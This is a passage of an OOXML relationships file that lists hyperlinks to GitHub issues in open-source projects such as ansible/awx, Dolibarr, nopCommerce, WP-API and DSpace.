TargetMode="External"/><Relationship Id="rId43" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/ansible/awx/issues/7798" TargetMode="External"/><Relationship Id="rId46" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/ansible/awx/issues/8641" TargetMode="External"/><Relationship Id="rId45" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/ansible/awx/issues/8305" TargetMode="External"/><Relationship Id="rId509" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/bbernhard/signal-cli-rest-api/issues/187" TargetMode="External"/><Relationship Id="rId508" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/bbernhard/signal-cli-rest-api/issues/177" TargetMode="External"/><Relationship Id="rId503" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/bbernhard/signal-cli-rest-api/issues/91" TargetMode="External"/><Relationship Id="rId502" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/bbernhard/signal-cli-rest-api/issues/19" TargetMode="External"/><Relationship Id="rId501" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/shopizer-ecommerce/shopizer/issues/355" TargetMode="External"/><Relationship Id="rId500" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/shopizer-ecommerce/shopizer/issues/3" TargetMode="External"/><Relationship Id="rId507" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/bbernhard/signal-cli-rest-api/issues/175" TargetMode="External"/><Relationship Id="rId506" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/bbernhard/signal-cli-rest-api/issues/135" TargetMode="External"/><Relationship Id="rId505" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/bbernhard/signal-cli-rest-api/issues/103" TargetMode="External"/><Relationship Id="rId504" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/bbernhard/signal-cli-rest-api/issues/95" TargetMode="External"/><Relationship Id="rId48" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/ansible/awx/issues/8838" TargetMode="External"/><Relationship Id="rId47" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/ansible/awx/issues/8777" TargetMode="External"/><Relationship Id="rId49" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/ansible/awx/issues/9222" TargetMode="External"/><Relationship Id="rId31" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/ansible/awx/issues/6365" TargetMode="External"/><Relationship Id="rId30" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/ansible/awx/issues/6362" TargetMode="External"/><Relationship Id="rId33" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/ansible/awx/issues/6460" TargetMode="External"/><Relationship Id="rId32" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/ansible/awx/issues/6433" TargetMode="External"/><Relationship Id="rId35" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/ansible/awx/issues/6498" TargetMode="External"/><Relationship Id="rId34" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/ansible/awx/issues/6492" TargetMode="External"/><Relationship Id="rId37" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/ansible/awx/issues/6630" TargetMode="External"/><Relationship Id="rId36" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/ansible/awx/issues/6520" TargetMode="External"/><Relationship Id="rId39" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/ansible/awx/issues/7191" TargetMode="External"/><Relationship Id="rId38" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/ansible/awx/issues/7063" TargetMode="External"/><Relationship Id="rId20" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/ansible/awx/issues/5528" TargetMode="External"/><Relationship Id="rId22" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/ansible/awx/issues/5882" TargetMode="External"/><Relationship Id="rId21" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/ansible/awx/issues/5717" TargetMode="External"/><Relationship Id="rId24" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/ansible/awx/issues/5983" TargetMode="External"/><Relationship Id="rId23" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/ansible/awx/issues/5964" TargetMode="External"/><Relationship Id="rId525" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/silverapp/silver/issues/104" TargetMode="External"/><Relationship Id="rId524" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/bbernhard/signal-cli-rest-api/issues/657" TargetMode="External"/><Relationship Id="rId523" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/bbernhard/signal-cli-rest-api/issues/654" TargetMode="External"/><Relationship Id="rId522" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/bbernhard/signal-cli-rest-api/issues/630" TargetMode="External"/><Relationship Id="rId529" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/silverapp/silver/issues/353" TargetMode="External"/><Relationship Id="rId528" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/silverapp/silver/issues/289" TargetMode="External"/><Relationship Id="rId527" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/silverapp/silver/issues/196" TargetMode="External"/><Relationship Id="rId526" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/silverapp/silver/issues/105" TargetMode="External"/><Relationship Id="rId26" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/ansible/awx/issues/6225" TargetMode="External"/><Relationship Id="rId25" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/ansible/awx/issues/6049" TargetMode="External"/><Relationship Id="rId28" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/ansible/awx/issues/6309" TargetMode="External"/><Relationship Id="rId27" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/ansible/awx/issues/6267" TargetMode="External"/><Relationship Id="rId521" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/bbernhard/signal-cli-rest-api/issues/550" TargetMode="External"/><Relationship Id="rId29" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/ansible/awx/issues/6342" TargetMode="External"/><Relationship Id="rId520" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/bbernhard/signal-cli-rest-api/issues/493" TargetMode="External"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/ansible/awx/issues/4781" TargetMode="External"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/ansible/awx/issues/4573" TargetMode="External"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/ansible/awx/issues/4910" TargetMode="External"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/ansible/awx/issues/4907" TargetMode="External"/><Relationship Id="rId519" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/bbernhard/signal-cli-rest-api/issues/489" TargetMode="External"/><Relationship Id="rId514" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/bbernhard/signal-cli-rest-api/issues/387" TargetMode="External"/><Relationship Id="rId513" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/bbernhard/signal-cli-rest-api/issues/369" TargetMode="External"/><Relationship Id="rId512" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/bbernhard/signal-cli-rest-api/issues/242" TargetMode="External"/><Relationship Id="rId511" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/bbernhard/signal-cli-rest-api/issues/236" TargetMode="External"/><Relationship Id="rId518" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/bbernhard/signal-cli-rest-api/issues/466" TargetMode="External"/><Relationship Id="rId517" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/bbernhard/signal-cli-rest-api/issues/412" TargetMode="External"/><Relationship Id="rId516" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/bbernhard/signal-cli-rest-api/issues/410" TargetMode="External"/><Relationship Id="rId515" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/bbernhard/signal-cli-rest-api/issues/403" TargetMode="External"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/ansible/awx/issues/5028" TargetMode="External"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/ansible/awx/issues/4943" TargetMode="External"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/ansible/awx/issues/5081" TargetMode="External"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/ansible/awx/issues/5046" TargetMode="External"/><Relationship Id="rId19" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/ansible/awx/issues/5478" TargetMode="External"/><Relationship Id="rId510" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/bbernhard/signal-cli-rest-api/issues/190" TargetMode="External"/><Relationship Id="rId18" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/ansible/awx/issues/5099" TargetMode="External"/><Relationship Id="rId84" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/Dolibarr/dolibarr/issues/23179" TargetMode="External"/><Relationship Id="rId83" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/sunscrapers/djoser/issues/430" TargetMode="External"/><Relationship Id="rId86" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/Dolibarr/dolibarr/issues/23415" TargetMode="External"/><Relationship Id="rId85" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/Dolibarr/dolibarr/issues/23345" TargetMode="External"/><Relationship Id="rId88" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/Dolibarr/dolibarr/issues/24661" TargetMode="External"/><Relationship Id="rId87" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/Dolibarr/dolibarr/issues/23790" TargetMode="External"/><Relationship Id="rId89" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/Dolibarr/dolibarr/issues/24780" TargetMode="External"/><Relationship Id="rId80" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/sunscrapers/djoser/issues/374" TargetMode="External"/><Relationship Id="rId82" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/sunscrapers/djoser/issues/417" TargetMode="External"/><Relationship Id="rId81" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/sunscrapers/djoser/issues/413" TargetMode="External"/><Relationship Id="rId73" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/treasure-data/digdag/issues/658" TargetMode="External"/><Relationship Id="rId72" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/treasure-data/digdag/issues/37" TargetMode="External"/><Relationship Id="rId75" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/sunscrapers/djoser/issues/42" TargetMode="External"/><Relationship Id="rId74" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/sunscrapers/djoser/issues/5" TargetMode="External"/><Relationship Id="rId77" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/sunscrapers/djoser/issues/190" TargetMode="External"/><Relationship Id="rId76" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/sunscrapers/djoser/issues/120" TargetMode="External"/><Relationship Id="rId79" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/sunscrapers/djoser/issues/327" TargetMode="External"/><Relationship Id="rId78" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/sunscrapers/djoser/issues/323" TargetMode="External"/><Relationship Id="rId71" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/corona-warn-app/cwa-verification-server/issues/55" TargetMode="External"/><Relationship Id="rId70" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/corona-warn-app/cwa-verification-server/issues/33" TargetMode="External"/><Relationship Id="rId62" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/ansible/awx/issues/13429" TargetMode="External"/><Relationship Id="rId61" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/ansible/awx/issues/13120" TargetMode="External"/><Relationship Id="rId64" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/ansible/awx/issues/13597" TargetMode="External"/><Relationship Id="rId63" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/ansible/awx/issues/13439" TargetMode="External"/><Relationship Id="rId66" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/nightscout/cgm-remote-monitor/issues/3468" TargetMode="External"/><Relationship Id="rId65" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/zalando-incubator/catwatch/issues/5" TargetMode="External"/><Relationship Id="rId68" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/nightscout/cgm-remote-monitor/issues/6843" TargetMode="External"/><Relationship Id="rId67" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/nightscout/cgm-remote-monitor/issues/5347" TargetMode="External"/><Relationship Id="rId60" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/ansible/awx/issues/11622" TargetMode="External"/><Relationship Id="rId69" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/nightscout/cgm-remote-monitor/issues/7910" TargetMode="External"/><Relationship Id="rId51" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/ansible/awx/issues/9472" TargetMode="External"/><Relationship Id="rId50" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/ansible/awx/issues/9441" TargetMode="External"/><Relationship Id="rId53" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/ansible/awx/issues/10008" TargetMode="External"/><Relationship Id="rId52" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/ansible/awx/issues/9772" TargetMode="External"/><Relationship Id="rId55" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/ansible/awx/issues/10681" TargetMode="External"/><Relationship Id="rId54" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/ansible/awx/issues/10383" TargetMode="External"/><Relationship Id="rId57" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/ansible/awx/issues/11017" TargetMode="External"/><Relationship Id="rId56" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/ansible/awx/issues/10879" TargetMode="External"/><Relationship Id="rId59" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/ansible/awx/issues/11523" TargetMode="External"/><Relationship Id="rId58" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/ansible/awx/issues/11130" TargetMode="External"/><Relationship Id="rId590" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/WP-API/WP-API/issues/1227" TargetMode="External"/><Relationship Id="rId107" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/Dolibarr/dolibarr/issues/32072" TargetMode="External"/><Relationship Id="rId349" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/nopSolutions/nopCommerce/issues/6484" TargetMode="External"/><Relationship Id="rId106" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/Dolibarr/dolibarr/issues/31677" TargetMode="External"/><Relationship Id="rId348" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/nopSolutions/nopCommerce/issues/6403" TargetMode="External"/><Relationship Id="rId105" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/Dolibarr/dolibarr/issues/31369" TargetMode="External"/><Relationship Id="rId347" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/nopSolutions/nopCommerce/issues/6007" TargetMode="External"/><Relationship Id="rId589" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/WP-API/WP-API/issues/1143" TargetMode="External"/><Relationship Id="rId104" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/Dolibarr/dolibarr/issues/31015" TargetMode="External"/><Relationship Id="rId346" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/nopSolutions/nopCommerce/issues/5990" TargetMode="External"/><Relationship Id="rId588" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/WP-API/WP-API/issues/1023" TargetMode="External"/><Relationship Id="rId109" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/Dolibarr/dolibarr/issues/32111" TargetMode="External"/><Relationship Id="rId108" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/Dolibarr/dolibarr/issues/32096" TargetMode="External"/><Relationship Id="rId341" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/nopSolutions/nopCommerce/issues/4548" TargetMode="External"/><Relationship Id="rId583" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/WP-API/WP-API/issues/414" TargetMode="External"/><Relationship Id="rId340" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/nopSolutions/nopCommerce/issues/3946" TargetMode="External"/><Relationship Id="rId582" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/WP-API/WP-API/issues/411" TargetMode="External"/><Relationship Id="rId581" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/WP-API/WP-API/issues/409" TargetMode="External"/><Relationship Id="rId580" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/WP-API/WP-API/issues/330" TargetMode="External"/><Relationship Id="rId103" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/Dolibarr/dolibarr/issues/30950" TargetMode="External"/><Relationship Id="rId345" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/nopSolutions/nopCommerce/issues/5469" TargetMode="External"/><Relationship Id="rId587" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/WP-API/WP-API/issues/862" TargetMode="External"/><Relationship Id="rId102" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/Dolibarr/dolibarr/issues/30432" TargetMode="External"/><Relationship Id="rId344" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/nopSolutions/nopCommerce/issues/4943" TargetMode="External"/><Relationship Id="rId586" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/WP-API/WP-API/issues/661" TargetMode="External"/><Relationship Id="rId101" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/Dolibarr/dolibarr/issues/30161" TargetMode="External"/><Relationship Id="rId343" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/nopSolutions/nopCommerce/issues/4621" TargetMode="External"/><Relationship Id="rId585" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/WP-API/WP-API/issues/492" TargetMode="External"/><Relationship Id="rId100" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/Dolibarr/dolibarr/issues/29594" TargetMode="External"/><Relationship Id="rId342" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/nopSolutions/nopCommerce/issues/4611" TargetMode="External"/><Relationship Id="rId584" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/WP-API/WP-API/issues/444" TargetMode="External"/><Relationship Id="rId338" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/nopSolutions/nopCommerce/issues/3604" TargetMode="External"/><Relationship Id="rId337" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/nopSolutions/nopCommerce/issues/3584" TargetMode="External"/><Relationship Id="rId579" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/WP-API/WP-API/issues/299" TargetMode="External"/><Relationship Id="rId336" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/nopSolutions/nopCommerce/issues/3382" TargetMode="External"/><Relationship Id="rId578" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/WP-API/WP-API/issues/290" TargetMode="External"/><Relationship Id="rId335" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/nopSolutions/nopCommerce/issues/3376" TargetMode="External"/><Relationship Id="rId577" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/WP-API/WP-API/issues/229" TargetMode="External"/><Relationship Id="rId339" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/nopSolutions/nopCommerce/issues/3630" TargetMode="External"/><Relationship Id="rId330" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/nopSolutions/nopCommerce/issues/1811" TargetMode="External"/><Relationship Id="rId572" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/WP-API/WP-API/issues/164" TargetMode="External"/><Relationship Id="rId571" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/WP-API/WP-API/issues/91" TargetMode="External"/><Relationship Id="rId570" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/WP-API/WP-API/issues/90" TargetMode="External"/><Relationship Id="rId334" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/nopSolutions/nopCommerce/issues/3174" TargetMode="External"/><Relationship Id="rId576" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/WP-API/WP-API/issues/228" TargetMode="External"/><Relationship Id="rId333" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/nopSolutions/nopCommerce/issues/2777" TargetMode="External"/><Relationship Id="rId575" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/WP-API/WP-API/issues/224" TargetMode="External"/><Relationship Id="rId332" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/nopSolutions/nopCommerce/issues/2776" TargetMode="External"/><Relationship Id="rId574" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/WP-API/WP-API/issues/221" TargetMode="External"/><Relationship Id="rId331" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/nopSolutions/nopCommerce/issues/2532" TargetMode="External"/><Relationship Id="rId573" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/WP-API/WP-API/issues/166" TargetMode="External"/><Relationship Id="rId370" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/Jigsaw-Code/outline-server/issues/1499" TargetMode="External"/><Relationship Id="rId129" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/DSpace/DSpace/issues/8888" TargetMode="External"/><Relationship Id="rId128" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/DSpace/DSpace/issues/8792" TargetMode="External"/><Relationship Id="rId127" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/DSpace/DSpace/issues/8765" TargetMode="External"/><Relationship Id="rId369" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/Jigsaw-Code/outline-server/issues/999" TargetMode="External"/><Relationship Id="rId126" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/DSpace/DSpace/issues/8732" TargetMode="External"/><Relationship Id="rId368" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/OrchardCMS/OrchardCore/issues/15381" TargetMode="External"/><Relationship Id="rId121" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/DSpace/DSpace/issues/3207" TargetMode="External"/><Relationship Id="rId363" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/OrchardCMS/OrchardCore/issues/9362" TargetMode="External"/><Relationship Id="rId120" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/DSpace/DSpace/issues/3185" TargetMode="External"/><Relationship Id="rId362" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/OrchardCMS/OrchardCore/issues/8986" TargetMode="External"/><Relationship Id="rId361" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/OrchardCMS/OrchardCore/issues/6520" TargetMode="External"/><Relationship Id="rId360" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/OrchardCMS/OrchardCore/issues/5694" TargetMode="External"/><Relationship Id="rId125" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/DSpace/DSpace/issues/8494" TargetMode="External"/><Relationship Id="rId367" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/OrchardCMS/OrchardCore/issues/13671" TargetMode="External"/><Relationship Id="rId124" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/DSpace/DSpace/issues/8023" TargetMode="External"/><Relationship Id="rId366" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/OrchardCMS/OrchardCore/issues/11953" TargetMode="External"/><Relationship Id="rId123" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/DSpace/DSpace/issues/7992" TargetMode="External"/><Relationship Id="rId365" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/OrchardCMS/OrchardCore/issues/10190" TargetMode="External"/><Relationship Id="rId122" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/DSpace/DSpace/issues/7946" TargetMode="External"/><Relationship Id="rId364" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/OrchardCMS/OrchardCore/issues/9508" TargetMode="External"/><Relationship Id="rId95" 